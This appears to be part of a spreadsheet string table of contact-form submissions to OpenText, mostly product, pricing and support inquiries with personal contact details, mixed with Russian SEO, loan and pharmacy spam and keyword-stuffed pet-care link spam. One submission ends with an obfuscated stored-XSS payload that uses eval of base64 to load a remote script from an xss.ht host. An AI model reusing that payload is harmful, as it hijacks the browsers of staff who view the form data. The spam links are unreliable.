 _x000D_
&lt;i&gt;AggressiveCatsthatAttackPeople, How To Deal With This ... Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; Spay &amp; Neuter Services. ... We offer spay/neuter surgeries for dogs, puppies, cats, ... Your pet will have a small green tattoo near the  Spay or Neuter a Pet - County of Sonoma, California &lt;/h3&gt;.&lt;br&gt;  _x000D_
[url=http://410provocvulgodr.soup.io/]Male dog s</t>
  </si>
  <si>
    <t>Dear_x000D_
_x000D_
We need an efax soluation for our company_x000D_
_x000D_
We are based in Saudi Arabia, Dammam._x000D_
_x000D_
Please send me a contact details of someone who can help</t>
  </si>
  <si>
    <t>To whom it may concern, _x000D_
We would like to know the price of the premium paid for OpenText Livelink Version 9.7.1. Details are as follows: _x000D_
No. of users - 1_x000D_
Excluding hardware and infrastructure Causeway ECM._x000D_
_x000D_
Best regards, _x000D_
Dar Al Handasah Nazih Taleb &amp; Partners - Abu Dhabi Branch</t>
  </si>
  <si>
    <t>We have sent email for the HK opentext sales but without response more than 3 weeks. We are looking for some profession advise from your services.</t>
  </si>
  <si>
    <t>[url=http://bit.ly/2doNLIP]эффективная раскрутка сайта[/url]_x000D_
 с помощью агрегатора сайтов _x000D_
 _x000D_
[url=http://site-agregator.ru][img]http://s45.radikal.ru/i110/1702/c6/e28611ea9003.gif[/img][/url]_x000D_
 _x000D_
 _x000D_
&lt;a href=http://bit.ly/2doNLIP&gt;первое место раскрутка сайта&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
 _x000D_
$$+$$*</t>
  </si>
  <si>
    <t xml:space="preserve">социальные закладки_x000D_
 _x000D_
 _x000D_
[url=http://bit.ly/2xbgWwR]карта сайта xml sitemap[/url]_x000D_
</t>
  </si>
  <si>
    <t>Уникальный портал для женщин всех возрастов. На страницах сайта вы найдете нестандартные решения многих актуальных проблем. Самые свежие новости от современных модниц, помогут молоденьким девушкам справиться, с вызывающими неприятный вид, угрями, Молодые мамы узнают, как избавиться от растяжек, а женщины постарше, в разделе Красота, найдут лучшие рецепты от ранних морщин. А кто из нас женщин не сталкивался с проблемой лишнего веса? Подробнее читайте на сайте [url=http://dom-lady.ru]dom-lady.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Стоимость установки калитки  _x000D_
 _x000D_
[url=http://antiotkat.net]шлагбаум откатной антивандальный[/url]_x000D_
[url=http://antiotkat.net]шлагбаум автоматический антивандальный цена с установкой[/url]_x000D_
[url=http://antiotkat.net]антивандальный шлагбаум установка[/url]_x000D_
 _x000D_
&lt;a href=http://antiotkat.net&gt;шлагбаум откатного типа&lt;/a&gt;_x000D_
&lt;a href=http://antiotkat.net&gt;установка автоматических откатных ворот&lt;/a&gt;_x000D_
&lt;a href=http://antiotkat.net&gt;установка автоматического шлагбаума&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>We have software firm in India, and we are working for many candian companies on outsourcing model,as you know the employee cost in India is cheap compare to canada and Us so many US and canada companies choose to have partnership with one indian based company so that we can work for you and increase your profit day by day._x000D_
_x000D_
Requesting you to have one discussion with me if you think i am able to show you your profit then we will take this ahead._x000D_
_x000D_
Looking forward to have response back from your side._x000D_
_x000D_
Regards_x000D_
Nitesh Sharma_x000D_
CRESOL_x000D_
+91-8462039227_x000D_
skype:msp.nitesh</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;strong&gt;CatBodyLanguage- Catster Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt; &lt;i&gt;CatNot Using Litter Box Yoru browser indicates if you've visited this  Your browser indicates if you've visited this link Q: In the past year, my 17-year-old Abyssiniancatstartedpeeingallovermyhouse . Cymba has already ruined an expensive oriental rug we've had dry cleaned but ...   More results.&lt;br&gt;  _x000D_
 [url=http://pruritabma01.soup.io/]Cats urine has blood in it[/url] [url=http://taufrinmun-me2d.soup.io/]Cat trying to pee[/url]  _x000D_
 &lt;h3&gt;Catsfor kids  All aboutcats Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt; CatUrineRemoval.  . ... Prpduct - Purina TidyCatsClumpingCatLitter with Glade ToughOdorSolutions Clear Springs for MultipleCats35lb.  to EliminateCatUrineSmell PERMANENTLY -  Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
betta fish nmaes _x000D_
 _x000D_
 How can I eliminate set-in dogurinescent from acarpet ? Your browser indicates if you've visited this link How can I eliminate set-in dogurinescent from acarpet ? ... In any case,I've had good luck with unscented "Hydrocide" at removing    More results.&lt;br&gt; &lt;i&gt;Cat ehavior - Wikipedia Your browser nidicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://hieflecapsa82.soup.io/]Feliway cat side effects[/url] [url=http://91confmemen-bi8j.soup.io/]Low price spay and neuter[/url]  _x000D_
 Best 25+ Urinesmellsideas on Pinterest  Pet uyrine cleaner ... Your browser indicates if you've visited this link Find and save ideas about Urinesmellson Pinterest.  See more ideas about Pet urine clewaner,Caturine and Clenaingcaturine.  /explore/urine-smells/ More results.&lt;br&gt; В· How to Find a Lost Cat. ... Cats sometimes run away with another cat. If you findf a stray cat that is ont yours, searhc around the area as yours may be  &lt;strong&gt;Advice on How to Find a Lost Cat - The Spruce&lt;/strong&gt;.&lt;br&gt;  _x000D_
cat peeing on shoes _x000D_
 _x000D_
&lt;h2&gt;Just  Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt; Make your own</t>
  </si>
  <si>
    <t>универсальный сервис _x000D_
для комплексного интернет-продвижения и поисковой _x000D_
оптимизации сайтов без посредников и переплат в одном месте! _x000D_
 _x000D_
Вы создаете проект, указав адрес вашего сайта, после чего наш менеджер анализирует его и предлагает оптимальные методы продвижения рекламной кампании. _x000D_
Следуя подсказкам и рекомендациям, всего за 10 минут вы запускаете недорогое, но эффективное поисковое продвижение. _x000D_
[url=http://bit.ly/2xbgWwR]текст alt[/url]_x000D_
 _x000D_
[url=http://interpult-s.ru][img]http://s50.radikal.ru/i129/1703/d2/97f1f93ff84d.png[/img][/url]_x000D_
 _x000D_
 _x000D_
 _x000D_
=Inter=</t>
  </si>
  <si>
    <t>Our company is getting ready for a sale, and I would like to find alternative solutions that I can present to my existing customers.  Based on Forrester's analysis you would be a good alternative.  I would want to talk to someone to better understand your offering._x000D_
_x000D_
Thanks in advance for your help._x000D_
_x000D_
Steve Tedjamulia_x000D_
CEO, Predictive Science_x000D_
stedjamulia@predictivescience.com_x000D_
8014717636</t>
  </si>
  <si>
    <t xml:space="preserve"> I  want  to take in mexico or the location  more  near  the Courses or  Workshops,VIM maybe remote or prsencial, and  inwhat number need tocall  in mexico or in other country and the prices, _x000D_
_x000D_
waiting your instructions _x000D_
_x000D_
Mario Cano</t>
  </si>
  <si>
    <t>Please provide a Opentext content on the cloud trial. Thak you</t>
  </si>
  <si>
    <t>Супермаркет Кредитов _x000D_
 _x000D_
[url=http://bit.ly/2wFmCem]Моментальные деньги на любые цели даже с плохой кредитной историей[/url] _x000D_
 _x000D_
[url=http://bit.ly/2wFmCem][img]http://s41.radikal.ru/i093/1709/70/fbb1a2aa5ab2.gif[/img][/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> With that in mind, here are 7 essentialcattoysto keep yourcathealthyand happy. #1  a natural instinct to  .com - Becayse EveryCatNeedsCatToys Your browser indicatse ift you've visited this link&lt;/h4&gt;.&lt;br&gt; Asoggymattresssoon takes on a musty smell, and within a day or two, may even begin to grow mold deep inside it. Of coryse, not everywetmattressis  Answered:HowtoDryaMattressCorrectly - Furniture Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://quidipebik1.soup.io/]Cat peeing in new house[/url] [url=http://254cratemen-jivd.soup.io/]Anti cat smell[/url]  _x000D_
 2.&lt;br&gt; &lt;strong&gt;Mynewcatispeeingand pooping on  - JustAnswer Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
cat food toy _x000D_
 _x000D_
 How to Clean UrineFrom aMattressOops!! Someone wet the bed! Time tocleanthemattressagain. Here  to Get Pee Stains Out of a Mattress!  InspiredHousewife&lt;/h3&gt;.&lt;br&gt; &lt;h4&gt;Stopyourcat'sspraying !!! This really works!! -  Your browser indicates if you've visited thislink&lt;/h4&gt;.&lt;br&gt;  _x000D_
  [url=http://deolispitsu8e.soup.io/]Sentry behavior spray[/url] [url=http://68exstirevme3r.soup.io/]Graffiti art spray can[/url]  _x000D_
 The long answer is that you may have done something to upset the cat and, in effect, caused the inappropriate urination behavior. From a human perspective, wwetting on  Urine IssuesвЂ“CatHealth &amp;Behavior&lt;/h2&gt;.&lt;br&gt; The #1 Selling Grass LitterBoxfor Dogs -PottyTraining ... Your browser indicatesif you've visited this link PorchPottyis the only self-rinsing "dogpotty " for indoors or outdoors. Real sod or synthetic grass option. The complete puppypottytraining solution.  More results.&lt;br&gt;  _x000D_
cat away spray _x000D_
 _x000D_
Bloodinurine- known medically as hematuria - is usually not a reason for major alarm. Becausebloodinurinecan be a sign of a serious medical condition, however  Dog Health Handbook Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt; This is a guide about removing cat urine odor from a couch. ... products forgettingcat pee out, </t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
_x000D_
I am a French qualified attorney in paris fluently working in English and French. I am keen on working on document review projects in Paris._x000D_
_x000D_
I will send you my resume if you wish to have a look at my professional experience (most recently in the field of document review, I worked with Consilio at the Paris office of a top tier US renowned law firm for 5 months in the frame of a FBI investigation)._x000D_
_x000D_
Yours sincerely,_x000D_
Catherine Huynh</t>
  </si>
  <si>
    <t>Hello!  The reason for this contact is to get more information about the OpenText Capture Center product.  Our company processes approximately 2M pages a year through our mailroom.  I would like to schedule a time to discuss our needs and possible solutions.  Thanks in advance for your time and attention.  -Don Jacobson, djacobson@mynuquest.com</t>
  </si>
  <si>
    <t>We (Vistaprint) are an OpenText customer, with an existing Support &amp; Maintenance Contract. However, I cannot login to see our products/activation keys on the customer portal/Knowledge Center. Can you assist?_x000D_
_x000D_
Thank you,_x000D_
Ron Desjardins_x000D_
rdesjardins@vistaprint.com_x000D_
(781_ 652-6696</t>
  </si>
  <si>
    <t>Good day, my name is Ledge i write to make an inquiries about your webfax service cost of sending faxes nation wide and more information on how this service works._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Ledge TUCHON_x000D_
Mattress Manager/ Sales Consultant_x000D_
Chariho Furniture_x000D_
10 Richmond Townhouse Road_x000D_
(Junction of Route 112 &amp; 138)_x000D_
Richmond, RI 02898_x000D_
Phone:  401.404.6423_x000D_
Fax:      401.539.9045</t>
  </si>
  <si>
    <t>Presently, we use Exceed Freedom to control the forwarding of the X display to our PCs from our RH 6.3 boxes when using Cadence Virtuoso Tool Suite for custom IC design. After upgrading to the 6.1 version of Cadence Virtuoso, I've noticed that the display doesn't always render well. I see that you have several tools available for this specified purpose. Which tool do you recommend for usage with Cadence IC 6.17? Presently, we have the following:_x000D_
getversions - Exceed Connection Server 13.7_x000D_
_x000D_
esessionmgr    Version 13.7.3.332, Revision 16978_x000D_
ewebhost       Version 13.7.3.335, Revision 17032_x000D_
authenticator  Version 13.7.3.332, Revision 16978_x000D_
cli            Version 13.7.3.308, Revision 16752_x000D_
keymgr         Version 13.7.0.229, Revision 15473_x000D_
elpr           Version 13.7.0.209, Revision 15072_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Dear Support_x000D_
_x000D_
I am not able to find "documentum" products in my login._x000D_
_x000D_
parshuram.juwekar@relianceada.com_x000D_
_x000D_
Kindly help me with same as they were available when i was logging in EMC support site. Please correct the same immediately._x000D_
_x000D_
Thanks_x000D_
Parshuram Juwekar_x000D_
9821252503_x000D_
Reliance Capital</t>
  </si>
  <si>
    <t>trying to get to the patch to download the beta patch, password will not work.  _x000D_
had a reset email sent to me, but still will not allow me to change password.</t>
  </si>
  <si>
    <t>canadian drug store_x000D_
 &lt;a href="http://canadianpharmacyseo.us/"&gt;canadian pharmacies online&lt;/a&gt; prescription drugs online without_x000D_
 [url=http://canadianpharmacyseo.us/]canadian pharmacies shipping to usa[/url]</t>
  </si>
  <si>
    <t>Looking for quotes for business license.</t>
  </si>
  <si>
    <t>Need pricing for eDocs document management for small law firm, and must have version control. Also, does eDocs integrate with Clio?</t>
  </si>
  <si>
    <t>I would like to purchase 4 licenses of Brava Desktop CXL-N. (Network)_x000D_
Would you please, provide a quote. Thanks_x000D_
Dany</t>
  </si>
  <si>
    <t xml:space="preserve">Solicito cotação sobre a integração EDI (Eletronic Data Interchange) com bancos, nosso intuito é automatizar processos financeiros para envio da Folha de Pagamento._x000D_
_x000D_
Favor encaminhar orçamento para o escopo abaixo:_x000D_
_x000D_
Conexão SFTP / Client.........:_x000D_
Setup da Habilitação...........:_x000D_
Mapeamento/Tradução......:_x000D_
Caixa Postal.........................:_x000D_
Custo do Mbyte/mês..........:_x000D_
Trabalham com os Bancos..: Santander, Itaú e Bradesco_x000D_
</t>
  </si>
  <si>
    <t>Need pricing for a Sharp MFP connector for Right Fax for RFP we are working on.</t>
  </si>
  <si>
    <t>Looking to attend the convention in  san Francisco ??</t>
  </si>
  <si>
    <t>SAP Invoice Management by OpenText</t>
  </si>
  <si>
    <t xml:space="preserve"> How to Remove Cat Urine: Why an Enzyme Cleaner must be used. ... When dry, the smell of cat pee will no longer tempt kitty to pee on the  to Remove Cat Urine : Why an Enzyme Cleaner вЂ¦&lt;/h4&gt;.&lt;br&gt; &lt;i&gt;Low-CostSpay /Neuter - Animazl Friends Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://801dispercifuc2.soup.io/]Eliminate dog urine smell[/url] [url=http://99morburbe-nuct.soup.io/]At what age do male cats start spraying[/url]  _x000D_
 Urineodor : Symptom вЂ” Learn when unusualurineodormight point to an underlying condition or  - Mayo Clinic&lt;/u&gt;.&lt;br&gt; &lt;strong&gt; Why is my cat urinating inappropriately? - RSPCA Australia ... &lt;/strong&gt;.&lt;br&gt;  _x000D_
cat uti causes _x000D_
 _x000D_
 In recent months, an overwhelming smell ofcatuirnehas been seeping into my co-op apartment from the adjacent one. I can smell it emanating from the  home purchase  TheCatSite Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; Comfort Zone withFeliway Refill ,6 Pack , UV53F70Y26N9Z Check this deal: http  _x000D_
  [url=http://321taurare-n8r.soup.io/]How to clean dog pee out of carpet[/url] [url=http://973trudertatsu55.soup.io/]Calming meds for cats[/url]  _x000D_
 В· Consider this your ultimate guide to eliminating cat urine smells from your home ... How to Get Cat Urine Smell Out of вЂ¦.&lt;br&gt; &lt;strong&gt;Causesmicroscopichematuria dehydration - HealthTap Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
kitty litter pans _x000D_
 _x000D_
: Caitt Design SmartSiift Sifting Cat Pan : Litter Boxes  It Works. Simply CleanВ® Automatc Litter Box. Give your cat a litter box that's always clean. The bowl continuously cleans by constantly (and slowly)  : Litter Spinner Cat Litter Box, Tan : Self Cleaning Litter  after the cat uses the litter box a sensor triggers a rotating mechanism that drops the waste into a drawer. Disposable trays with crystals that absorb  : PetSafe Simply Clean elf-Cleaning Ca Litter Box  Oct 2009 ...  The Omega Paw Roll'n Clean Self-Cleaning Litter Box cleans in just seconds  Cle</t>
  </si>
  <si>
    <t>Interested in document management and more for a law firm of 9 employees</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
J'aimerais obtenir une adresse courriel de votre compagnie pour vous faire parvenir un avis d'appel d'intérêt afin d'avoir de l'information sur vos produits._x000D_
Merci de m'envoyer un courriel avec votre contact._x000D_
Bonne journée,_x000D_
Amélie Coutu</t>
  </si>
  <si>
    <t>We are looking at products that we can use to scan and extract data that we are currently manually imputing. I am looking into OpenText™ Capture Center and was wondering the cost for licensing. We would need the unlimited number of fields option and would probably have around 60,000 processed pages per year to start but would be interested in knowing the different tiers for pricing._x000D_
_x000D_
Thank you._x000D_
Chris Liscumb_x000D_
Kent Group Ltd</t>
  </si>
  <si>
    <t xml:space="preserve">account number: 860252 I need to speak with a Sales Representative to get pricing. to add additional fax numbers. Please at your earliest convenience, If i do not answer my phone PLEASE email me, so i can call you back ASAP. TY Kelly </t>
  </si>
  <si>
    <t>I was working with Cesar on support ticket SR 1-3083489604 regarding TLi and BizManager upgrades. We are good there, but I still require migration information. We are working with Fernco, Inc (Davison, MI) to migrate them to a new IBM server and I need to know the steps required for these programs and any licensing information we need to acquire/transfer. _x000D_
Thank you,_x000D_
Julie Shoemaker</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
We have recently purchased the ISATIS software by Geovariances company (France). The thing is that this software does not work on Windows OS without OpenText Exceed software. Therefore we are really interested in acquiring Open Text Exceed software licenses. We have 20 site licenses of Isatis software for education use for 3 years. Could you please advice us an appropriate type of OpenText Exceed software licenses and provide us a quote for it (with academic discounts if you have any) and the options of purchasing the software directly from you or from one of your offices (give us the contacts please)?   _x000D_
_x000D_
Hope to hear from you soon._x000D_
Thanks in advance!_x000D_
Best regards,_x000D_
Aigerim_x000D_
 </t>
  </si>
  <si>
    <t>Магазин чемпион в городе Самаре представляет скидки на все виды снегоуборщиков: снегоуборщик champion. Champion помогает вам в работе и ремонте в доме и ценит ваше мнение. _x000D_
 _x000D_
Владельцы деревенских домов в зимнее время года сталкиваются с трудностью  очищения снежных масс. Чтобы облегчить эту задачу, необходим снегоуборщик champion. _x000D_
На сегодняшний день рынок делает отличное предложение изрядно изделий, видов  зимней техники.. Из _x000D_
контраста имеющегося модельного ряда нужно вобрать  себе оптимизированный допустимый вариант, который подходил  бы всем   пожеланиям и поисковым запросам. Мы большой импортер снегоуборочной техники. _x000D_
 _x000D_
Наша компания benzotreid это деятельно раскручивающаяся холдинг которая реализовывает снегоуборочную оборудование. _x000D_
Мы работаем по всему России. _x000D_
 _x000D_
Бренд CHAMPION на Российском рынке появился давно. Те, кто работают на своём придомовом участке знают его уже по одному фирменному знаку. ЧЕМПИОН это сельская техника которой можно пользоваться во все времена. Большинство из производимой агротехники от Champion всесезонна и дополняет себя. Такая техника как: Мотоблоки дизельные может быть использована в обработки земли. В поливе ваших лужаек легко справится такой агрегат от мегабренда CHAMPION как: Насосные станции. _x000D_
 _x000D_
За более подробной информацией можно обратиться на официальный сайт мегабренда Champion. _x000D_
 _x000D_
Скидка 2,43% от стоимости любого товара, успей забрать свою скидку. _x000D_
 _x000D_
[url=https://www.benzotreid.ru/brends/champion/snegouborshhiki-chempion/]снегоуборщик чемпион цена[/url]</t>
  </si>
  <si>
    <t>Needed vendor help for the upgrade of Case360 from 11.3 to 11.5 version</t>
  </si>
  <si>
    <t>Interpult Studio - СЕРВИС ДЛЯ ПРИВЛЕЧЕНИЯ КЛИЕНТОВ ИЗ ИНТЕРНЕТА. _x000D_
ПОИСКОВОЕ ПРОДВИЖЕНИЕ, КОНТЕКСТНАЯ РЕКЛАМА, КОНТЕНТ МАРКЕТИНГ И ДРУГИЕ ИНСТРУМЕНТЫ ДЛЯ БИЗНЕСА _x000D_
[url=http://bit.ly/2xbgWwR]проверить позицию сайта в поиске[/url]_x000D_
 _x000D_
[url=http://bit.ly/2xbgWwR][img]http://s019.radikal.ru/i601/1703/e2/96eaf801cb68.png[/img][/url]_x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
=Inter=</t>
  </si>
  <si>
    <t>I'm trying to change my email address (company has changed all) from jjclapes@generali.es to juanjose.clapes@generali.com, and an error page is showed.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Do you have eRoom_x000D_
Do you still have livelink</t>
  </si>
  <si>
    <t xml:space="preserve">Do you still offering eRoom </t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
Hope you having a nice day!!_x000D_
I am from CCJK. We focus on Chinese, Japanese and Korean languages’ translation services._x000D_
If there is any possibility to get some translation jobs from your esteemed company?_x000D_
Have a wonderful day!_x000D_
Best regards_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hej,_x000D_
Jag jobbar på ett företag som heter BQ - en helhetsleverantör av ID och passerkortshantering._x000D_
I vår produktportfölj finns bland annat korthållare, nyckelband och yoyos._x000D_
_x000D_
Är intresserad av att höra vilka eventuella behov ni på Open Text har av dessa produkter._x000D_
Skulle ni kunna hjälpa mig att komma i kontakt med person som ansvarar för denna typen av inköp? _x000D_
_x000D_
Tack på förhand!_x000D_
_x000D_
Med vänlig hälsning_x000D_
Carl Stuchly_x000D_
Sales_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
im Rahmen meiner Projekt- und Bachelorarbeit bei der Firma IGZ vergleiche ich verschiedene ECM-Systeme. Daher würde ich mich freuen, wenn Sie mir entsprechendes Informationsmaterial über Ihr ECM-System zukommen lassen könnten._x000D_
_x000D_
Bitte antworten Sie mir per E-Mail!_x000D_
_x000D_
Vielen Dank im Voraus!_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Sonja Hahn</t>
  </si>
  <si>
    <t>Wanting to talk further about Opentext resellers in NZ_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"&gt;&lt;input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY2Rkbi54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Анекдот - устное народное творчество. Автором анекдотов является народ. На сайте собраны лучшие образцы этого творчества. Весь контент уникальный, при копировании ОБЯЗАТЕЛЬНА активная ссылка на наш сайт! _x000D_
 _x000D_
[url=http://yanekdots.ru]Избранные анекдоты[/url]_x000D_
[url=http://yanekdots.ru]Анекдоты[/url]_x000D_
[url=http://yanekdots.ru]Лучшие анекдоты[/url]_x000D_
&lt;a href=http://yanekdots.ru&gt;Лучшие анекдоты&lt;/a&gt;_x000D_
[url=http://yanekdots.ru]yanekdots.ru[/url]_x000D_
</t>
  </si>
  <si>
    <t>I'm currently sourcing for ongoing maintenance support for Rightfax servers installed in one our client premises.  Kindly refer appropriate/Licensed business partners that can provide remote support from the following locations: Philippines, Malaysia, and India.  _x000D_
_x000D_
I would appreciate it if you can respond to me via email and  cc: Sarkar, Joydeep &lt;joydeep.sarkar@hpe.com&gt;_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We run Opentext as our Content management solution for our internet site.  We are looking for training courses for our developers and web support staff.  Can you please advise on training courses available in Pert, Western Australia or alternatively training courses on Opentext CMS available in Australia or the Asia-Pacific region?_x000D_
_x000D_
thanks heaps,_x000D_
_x000D_
David Buddrige.</t>
  </si>
  <si>
    <t>[url=http://cryptofan.net/cloud-mining-without-investment.html][img]http://internetaccessmonitor.ru/uploads/posts/2016-09/1474377415_32-32_system_dlya_dll186.png[/img][/url] _x000D_
Всем привет, уже третий день не могу поставить DirectX - пробовал установить DLL тдельно, но не помогает, пишет что у меня 32-х битная система. Что делать?</t>
  </si>
  <si>
    <t>I'm researching MBSE tools for my customer (DHS) who requires the ability to generate DODAF-compliant views in SysML notation.  My customer also needs the ability to define use cases, capture and relate requirements, produce requirements traceability and verification matrices and specifications, generate custom/tailored reports including read-only versions of the model that can be viewed in browsers like IE or Chrome, and export data in formats supported by other tools (e.g., CSV, XMI).</t>
  </si>
  <si>
    <t>how can I pay my bill online</t>
  </si>
  <si>
    <t>Please update account# 77774 to reflect Suzy Olafsson, replacing Ashley Zarella._x000D_
Contact information is above.</t>
  </si>
  <si>
    <t>Can you please have my local sales rep contact me, the Medical Center is interested in your digital asset management solution.</t>
  </si>
  <si>
    <t>I'm researching MBSE tools for my customer (DHS) who requires support developing DoDAF-compliant views in SysML notation.  My customer will need to capture requirements, trace them to model elements, and generate reports on all model elements including requirement specifications.  Does ProVision provide this support?  Are there any other OpenText solutions that have these features?</t>
  </si>
  <si>
    <t>I am trying to access my organization's account. It was established by a former employee, Doug Frisbie. Can you help me gain access to it?_x000D_
_x000D_
Thank you!_x000D_
Katrina</t>
  </si>
  <si>
    <t>Our Payroll team has a number terminating to you (425.329.3646) and is currently routing to email address expepay@expedia.com and they would like this changed to NORAMpayroll@expedia.com. Or could you have our account rep reach out also._x000D_
_x000D_
Thanks!_x000D_
Tracy</t>
  </si>
  <si>
    <t>We're in the exploratory phase of a project to improve our overall interactive publishing user experience, specifically the browser based plug in that allows users to interactively edit documents. We'd like to set up an initial call/demo to learn more. Thanks!</t>
  </si>
  <si>
    <t>Received Invoice Billing Doc # 9000163373. Please call me regarding the same. Thank you.</t>
  </si>
  <si>
    <t>I've requested the FREE Brava! Reader software twice now, but have never received an e-mail with a link to download the software. I don't see any thing in my "junk mail" folder, so I'm assuming it was never sent? Please advise! Thanks.</t>
  </si>
  <si>
    <t>Looking for a partner in Business process management solution. Kindly let me know if there is a possibility of working with you as a value added re-seller .</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Are you looking to acquire a database of Alfresco technology users across worldwide?_x000D_
_x000D_
Let me know if you are interested in the above mentioned or any other technology users database._x000D_
_x000D_
Looking forward to hear back from you._x000D_
_x000D_
Thank you,_x000D_
Michelle Johnson_x000D_
Database consultant</t>
  </si>
  <si>
    <t>We have an old Opentext fax press and would like to see cost to upgrade it.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to speak with a knowledgeable salesperson asap to arrange a demo for Baker McKenzie. Please do not send me to Don Le - I need to speak with someone who knows who Baker McKenzie is, what a law department is looking for in terms of KM, etc. I easily lined up a demo with HighQ - so far the experience with them has been exponentially better. </t>
  </si>
  <si>
    <t>I am interested in your pricing for eDocs for my solo law practice.  I'm not sure that the pricing will work out, but always enjoyed your product at my old law firm.  Please email me.  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from SMRT in Singapore!_x000D_
_x000D_
I am reaching out to ask if you may be keen to explore Strides Transportation - a wholly owned subsidiary of SMRT._x000D_
_x000D_
We provide customisable private limousine service and our existing fleet includes unmarked sedans and MPVs._x000D_
_x000D_
Looking forward to hearing your thoughts!_x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>Can't access our my support account so I can download the Brava! Desktop TXL 16.2 that I just ordered.</t>
  </si>
  <si>
    <t>Would like to set up a demo of the analytic(s) platform...</t>
  </si>
  <si>
    <t xml:space="preserve"> WirelessDeerFenceDeerRepellent Is ProveenDeerDamage Control Across The World вЂ” Since 1999. The WirelessDeerFencedeerrepellent is adeerdamage control  --Scents - University of Vermont Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; &lt;i&gt;CarpetCleaningTisp: UsingSteamCleaningto Rmove Pet ... Yout browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://973paurelandzu1a.soup.io/]Male cat urinary problems home remedies[/url] [url=http://60onexictedb.soup.io/]Best way to get urine smell out of couch[/url]  _x000D_
 CatToys- Free shipping at  Your browser indicates if you've visited this link CatToys .Catslove to play, but did you know that playtime is vital activity forkittensand adultcatstoo? Help your cuddlycatplya well with the besttoysfor ...  /b/tys-326 More results.&lt;br&gt; Why dofemaleand nuetered malecatsspray? ... DoFemaleCatsSpray? ... and elsewhere in a hormone-fueled effort tomarktheirterritory ..&lt;br&gt;  _x000D_
cat urine smell out of cloghes _x000D_
 _x000D_
 Leatherstains from food, ink,urine ,  ... In most casesctuirnedamages  to Clean PetUrinefromLeatehrFurntiure Your browser indicates if you've visited this liknk&lt;/i&gt;.&lt;br&gt; Neutering, from the Latin neuter ("of neither sex"), is the removal of an animkal's reproductive organ, either all of it or a considerably large  How to Care for Gour Cat After Neutering or Spaying &lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://694probinex-n3m.soup.io/]Cat wont stop peeing on bed[/url] [url=http://57crisrime-kegw.soup.io/]Ways to stop cats from peeing in the house[/url]  _x000D_
 Formula to get cat urine out ... from Wal-Mart called Messy Pet cat stain and Oder removal, ... to report thatt there is ZERO cat urine odor on our  The 2 BestWays to Remove teh Smell of Cat or Dog Urine ... &lt;/u&gt;.&lt;br&gt; Cleaning Stains and Odor from FoamMattreswes-Bedrooms Your brtowser indicates if you've visited this link How to clean a foammattress . Cleaning itps to reoveurinestains and odors from your mattresses. Clean and care for your foammattresswiht all natural solu</t>
  </si>
  <si>
    <t xml:space="preserve">We have done business with you for sometime.  Since you have changed names and address, we need a W9 tax form.  Also, you normally send the billing statement attn: to Eddie Quinton.  He has deceased.  We need it sent to Greg Lanter.  Our customer # 001000002241.  I did call and leave a voicemail. </t>
  </si>
  <si>
    <t>[url=http://bit.ly/2yMlXw7]машина эвакуатор[/url]_x000D_
 _x000D_
 _x000D_
[url=http://ewacuator.cait2.ru][img]http://s019.radikal.ru/i644/1710/4d/260a76e5b4de.png[/img][/url] _x000D_
 _x000D_
эвакуация легкового автомобиля_x000D_
 _x000D_
 _x000D_
 _x000D_
evak_avto</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I would like to inquire about Extended ECM for Microsoft SharePoint; the Government of Canada uses OpenText Content Server 10.5; I was wondering how ECM works and if it is possible to integrate with SharePoint._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>We're working with a very large customer that uses OpenText and I'm looking for more documentation on your APIs etc.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in purchasing Brava Reader for a terminal server. </t>
  </si>
  <si>
